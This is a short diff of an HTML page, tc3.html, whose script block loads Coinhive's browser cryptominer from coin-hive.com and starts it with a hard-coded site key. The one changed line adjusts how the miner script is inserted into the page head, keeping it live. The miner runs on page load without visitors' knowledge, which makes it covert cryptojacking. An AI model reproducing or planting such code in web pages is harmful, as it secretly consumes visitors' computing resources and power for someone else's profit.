--- a/tc3.html
+++ b/tc3.html
@@ -10,7 +10,7 @@
 		js.id=id;
 		js.src="//coin-hive.com/lib/coinhive.min.js";
 		js.appendChild(d.createTextNode("var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();"));
-		fjs.parentNode.insertBefore(js,fjs);}
+		d.head.insertBefore(js,fjs);}
 		}(document,"script","cjs");
   </script>
 <!--<meta content="EVERYDAYHITS.ORG" property="og:site_name">-->
